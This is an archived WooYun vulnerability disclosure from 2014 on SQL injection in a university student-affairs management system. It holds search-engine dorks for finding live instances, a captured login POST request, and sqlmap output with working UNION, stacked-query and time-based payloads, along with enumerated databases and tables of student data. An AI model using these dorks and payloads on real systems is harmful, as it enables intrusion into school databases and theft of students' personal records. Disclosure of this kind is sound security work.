某高校管理系统存在通用型SQL注入漏洞

漏洞概要

缺陷编号:WooYun-2014-054213

漏洞标题:某高校管理系统存在通用型SQL注入漏洞

相关厂商:西安奥达软件工程有限公司

漏洞作者:Mr.leo

提交时间:2014-03-29 11:30

公开时间:2014-06-25 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2014-03-29: 细节已通知厂商并且等待厂商处理中
2014-04-01: 厂商已经确认,细节仅向厂商公开
2014-04-04: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2014-05-26: 细节向核心白帽子及相关领域专家公开
2014-06-05: 细节向普通白帽子公开
2014-06-15: 细节向实习白帽子公开
2014-06-25: 细节向公众公开

简要描述:

某高校管理系统存在通用型SQL注入漏洞

详细说明:

西安奥达软件工程有限公司旗下高校学生工作管理系统前台及后台均存在注入漏洞1、高校学生工作管理系统前台intitle:学生工作管理系统Login/List.aspx?ID=

**.**.**.**/login/List.aspx?ID=10http://**.**.**.**/Login/List.aspx?ID=99http://**.**.**.**/Login/List.aspx?ID=99**.**.**.**/login/List.aspx?ID=99**.**.**.**/Login/List.aspx?ID=99以http://**.**.**.**/Login/List.aspx?ID=99为例sqlmap identified the following injection points with a total of 100 HTTP(s) requests:---Place: POSTParameter: txtUserIdType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录Type: stacked queriesTitle: Microsoft SQL Server/Sybase stacked queriesPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录Type: AND/OR time-based blindTitle: Microsoft SQL Server/Sybase time-based blindPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: txtUserIdType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录Type: stacked queriesTitle: Microsoft SQL Server/Sybase stacked queriesPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录Type: AND/OR time-based blindTitle: Microsoft SQL Server/Sybase time-based blindPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录---current user: 'auda'current database: 'StudWorkXiDian'available databases [7]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] StudWorkXiDian[*] tempdb可跨库Database: pubs[14 tables]+----------------------+[dbo/awthors] || [dbo/discounts] || [dbo/employee] || [dbo/jobs] || [dbo/pwb_info] || [dbo/pwblishers] || [dbo/roysched] || [dbo/sales] || [dbo/stores\t] || [dbo/sysconstraints] || [dbo/syssegments] || [dbo/titleawthor] || [dbo/titles\r\t] || [dbo/titleview] |+----------------------+2、高校学生工作管理系统后台关键字:inurl:/Login/loginpageforuserb.aspx**.**.**.**/Login/loginpageforuserb.aspxhttp://**.**.**.**/Login/loginpageforuserb.aspxhttp://**.**.**.**/Login/loginpageforuserb.aspx**.**.**.**/Login/loginpageforuserb.aspx**.**.**.**/Login/loginpageforuserb.aspxhttp://**.**.**.**/Login/loginpageforuserb.aspx**.**.**.**/Login/loginpageforuserb.aspx**.**.**.**/Login/loginpageforuserb.aspxhttp://**.**.**.**/Login/loginpageforuserb.aspx以**.**.**.**/Login/loginpageforuserb.aspx为例用户名处没有过滤(txtUserId),导致注射burp抓包POST **.**.**.**/Login/loginpageforuserb.aspx HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: **.**.**.**/Login/loginpageforuserb.aspxCookie: ASP.NET_SessionId=oj5sbgn3ovvansabkijagoazConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 719__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZI%2B9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=%2FwEWBwLo5YDJCAKz8dy8BQKd%2B7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1&txtPwd=1&RadioButtonList1=1&Button1=%E7%99%BB+%E5%BD%95Place: POSTParameter: txtUserIdType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58),NULL-- &txtPwd=1&RadioButtonList1=1&Button1=? ?Type: stacked queriesTitle: Microsoft SQL Server/Sybase stacked queriesPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=? ?Type: AND/OR time-based blindTitle: Microsoft SQL Server/Sybase time-based blindPayload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=? ?---[15:36:02] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000[15:36:02] [INFO] fetching current usercurrent user: 'auda'[15:36:02] [INFO] fetching current databasecurrent database: 'StudWorkXiDian'[15:36:02] [INFO] fetching database names[15:36:02] [INFO] the SQL query used returns 7 entries[15:36:02] [INFO] resumed: "master"[15:36:02] [INFO] resumed: "model"[15:36:02] [INFO] resumed: "msdb"[15:36:02] [INFO] resumed: "Northwind"[15:36:02] [INFO] resumed: "pubs"[15:36:02] [INFO] resumed: "StudWorkXiDian"[15:36:02] [INFO] resumed: "tempdb"available databases [7]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] StudWorkXiDian[*] tempdb257张表Database: StudWorkXiDian[257 tables]+-------------------------------+| dbo.LogTemp || dbo.Test || dbo.Vstipend_ApplyInfo || dbo.Vsubsidy_ApplyInfo || dbo.[tsys_Modules_测试] || dbo.dtproperties || dbo.sysconstraints || dbo.syssegments || dbo.tAcc_File || dbo.tAppoinmentRelation || dbo.tAppointment || dbo.tAppointmentType || dbo.tAppointmentTypeExplain || dbo.tArr_Accessories || dbo.tArr_ArrType || dbo.tArr_Auditing || dbo.tArr_requiteType || dbo.tCadre_InWork || dbo.tCadre_OutWork || dbo.tCadre_StudWork || dbo.tDorm_Area || dbo.tDorm_Bed || dbo.tDorm_Building || dbo.tDorm_ChargeHistory || dbo.tDorm_History || dbo.tDorm_RewardHistory || dbo.tDorm_Room || dbo.tDorm_RoomMaster || dbo.tDorm_RoomType || dbo.tDrom_BuildingUser || dbo.tFile_Video || dbo.tGB_GMZ || dbo.tGB_HYZK || dbo.tGB_JKZK || dbo.tGB_SJGGHDQ || dbo.tGB_XB || dbo.tGB_XW || dbo.tGB_XZQH || dbo.tGB_ZZMM || dbo.tJQRY_Apply || dbo.tJQRY_SP || dbo.tJQRY_Type || dbo.tOther_ArcAgent || dbo.tOther_ArcBase || dbo.tOther_ArcContent || dbo.tOther_ArcItem || dbo.tOther_ArcTurnOver || dbo.tPoor_Student || dbo.tPopedom_Atom || dbo.tReg_register || dbo.tReplyAppointment || dbo.tSchoolLoanLevel || dbo.tSchoolLoanProportion || dbo.tSchoolLoanRefund || dbo.tSchoolLoans || dbo.tStudCadre_Info || dbo.tStudCadre_Type || dbo.tStudCadre_Unit || dbo.tStud_AllowApply || dbo.tTemp_Apply || dbo.tarm_AwardList || dbo.tarm_CentType || dbo.tarm_StudCourse || dbo.tarm_StudLevy || dbo.tarm_StudRecord || dbo.tarm_policy || dbo.tarr_Info || dbo.tarr_repay || dbo.tasl_Affirm || dbo.tasl_Bank || dbo.tasl_BankAuditing || dbo.tasl_BankBargain || dbo.tasl_Breach || dbo.tasl_End || dbo.tasl_Extend || dbo.tasl_Familial || dbo.tasl_Imburse || dbo.tasl_LoanType || dbo.tasl_Postponed || dbo.tasl_SchoolAuditing || dbo.tasl_SchoolAuditingIdea || dbo.tasl_StudRequisition || dbo.tasl_Whither || dbo.tbase_Department || dbo.tbase_Teacher || dbo.tbase_User || dbo.tcgt_StudCourse2 || dbo.tcgt_StudCourse3 || dbo.tcgt_StudRecord2 || dbo.tcgt_StudRecord3 || dbo.tcgt_stdResultCell || dbo.tcgt_stdResultCell2 || dbo.tcgt_stdResultCell3 || dbo.tcgt_stdScale2 || dbo.tcgt_stdScale3 || dbo.tcmoe_RewardLevel || dbo.tcmoe_RewardType || dbo.tcmoe_StatusChangeCause || dbo.tcmoe_StatusChangeType || dbo.tcode_Academic || dbo.tcode_BloodType || dbo.tcode_CultivateMode || dbo.tcode_Educate || dbo.tcode_Emigrant || dbo.tcode_Job || dbo.tcode_LoanState || dbo.tcode_Post || dbo.tcode_ProSchoolAccount || dbo.tcode_PsychologyLevel || dbo.tcode_StudType || dbo.tcode_TeacherRole || dbo.tcode_poorType || dbo.tcpt_BranchActivity || dbo.tcpt_ClassRelation || dbo.tcpt_Document || dbo.tcpt_MemberStudy || dbo.tcpt_PartyActive || dbo.tcpt_PartyBranch || dbo.tcpt_PartyMember || dbo.tcpt_PartyPrep || dbo.tcpt_PersonRelation || dbo.tcpt_Requisition || dbo.terr_Accessories || dbo.terr_Auditing || dbo.terr_Auditing2 || dbo.terr_ErrCause || dbo.terr_ErrInfo || dbo.terr_ErrType || dbo.terr_PunishType || dbo.terr_Remove || dbo.titem_PartyBranchType || dbo.titem_PartyMemberType || dbo.titem_PartySchoolType || dbo.tmem_BookEnrol || dbo.tmem_ChooseCadre || dbo.tmem_Development || dbo.tmem_DevelopmentNum || dbo.tmem_MemBerDocment || dbo.tmem_MemCharge || dbo.tmem_Member || dbo.tmem_OrgType || dbo.tmem_Party || dbo.tmem_PartyNum || dbo.tmem_Record || dbo.tmem_Rewards || dbo.tmem_TrainDepartment || dbo.tmem_TrainManInfo || dbo.tmem_orgMan || dbo.tmem_organization || dbo.tmema_ActivityApply || dbo.tmema_ActivityAudit || dbo.tmema_ActivityField || dbo.tmema_AssnJob || dbo.tmema_AssnMember || dbo.tmemp_Activity || dbo.tmemp_ComAuthor || dbo.tmemp_ComManuscript || dbo.tmemp_ComReport || dbo.tmemp_PublicationIssue || dbo.tmemp_PulicJob || dbo.tpopedom_UserBackManage || dbo.tpopedom_UserModule || dbo.treward_Information || dbo.treward_InformationG || dbo.treward_TypeG || dbo.tsafety_InsurePayforMoney || dbo.tsafety_InsureRegStudent || dbo.tsafety_SafetyGrade || dbo.tsafety_Type || dbo.tschol_Annotion || dbo.tschol_Apply || dbo.tschol_Classify || dbo.tschol_Quotas || dbo.tschol_RankObj || dbo.tssc_History || dbo.tstipend_Annotion || dbo.tstipend_Apply || dbo.tstipend_Apply_Temp || dbo.tstipend_Classify || dbo.tstipend_Quotas || dbo.tstipend_RankObj || dbo.tstud_Accessories || dbo.tstud_CardPrint || dbo.tstud_CardPrintFiled || dbo.tstud_Family || dbo.tstud_FieldEdit || dbo.tstud_Student_BKS || dbo.tstud_Student_Temp_BKS || dbo.tstud_Student_Temp_YJS || dbo.tstud_Student_YJS || dbo.tsubsidy_Annotion || dbo.tsubsidy_Apply || dbo.tsubsidy_Apply_Temp || dbo.tsubsidy_Classify || dbo.tsubsidy_Quotas || dbo.tsubsidy_RankObj || dbo.tsys_Download || dbo.tsys_FriendlyLink || dbo.tsys_Notice || dbo.tsys_NoticeType || dbo.tsys_Options || dbo.tsys_VoteList || dbo.tsys_VoteProject || dbo.tsys_VoteRen || dbo.tsys_loginLog || dbo.tsys_loginSession || **.**.**.**ork_Apply || **.**.**.**ork_Apply_Temp || **.**.**.**ork_CheckIn || **.**.**.**ork_Department || **.**.**.**ork_PayMoney || **.**.**.**ork_PostObj || **.**.**.**ork_PostType || dbo.txm_PYFS || dbo.txm_SS || dbo.txm_XL || dbo.txm_XSLX || dbo.txm_XSZT || dbo.vAloan_ListAff || dbo.vAloan_ListBasic || dbo.vAloan_ListExtend || dbo.vArr_ApplyInfo_BKS || dbo.vArr_ApplyInfo_YJS || dbo.vCadreGroup_state || dbo.vDorm_AllRoomDetail || dbo.vDorm_Bed || dbo.vDorm_BuidingCode || dbo.vDorm_CanBePreared || dbo.vDorm_CanUseBed || dbo.vDorm_Preared || dbo.vDorm_UsedBed || dbo.vDorm_building || dbo.vDorm_room || dbo.vDorm_student || dbo.vSchol_QuotaForDept || dbo.vSchoolLoans_BKS || dbo.vbase_Department || dbo.vcgt_StudSumRecord2 || dbo.vcgt_StudSumRecord3 || dbo.vcgt_student || dbo.vparty_PersonRelation || dbo.vparty_StatBranchSum || dbo.vpopedom_UserModule || dbo.vschol_QuotaForClass || dbo.vstipend_Classify || dbo.vstipend_QuotaForClass || dbo.vstipend_QuotaForDept || dbo.vstipend_QuotaForGrade || dbo.vstud_Student_BKS || dbo.vstud_Student_Temp_BKS || dbo.vstud_Student_YJS || dbo.vsubsidy_Classify || dbo.vsubsidy_QuotaForClass || dbo.vsubsidy_QuotaForDept || dbo.vsubsidy_QuotaForGrade || dbo.vtstud_Student_Temp_YJS || dbo.vwork_Department |+-------------------------------+

漏洞证明:

已经证明

修复方案:

过滤多个参数

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-04-0109:12

厂商回复:

CNVD确认并复现所述多个实例情况,验证和处置工作均由CNCERT转发给上海交通大学网络信息中心完成。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 zzR 白帽子 | Rank:1179 漏洞数:101)

    消灭0回复

  2. 2010-01-01 00:00 Mr.leo 白帽子 | Rank:932 漏洞数:80)

    @zzR 你的使命很神圣啊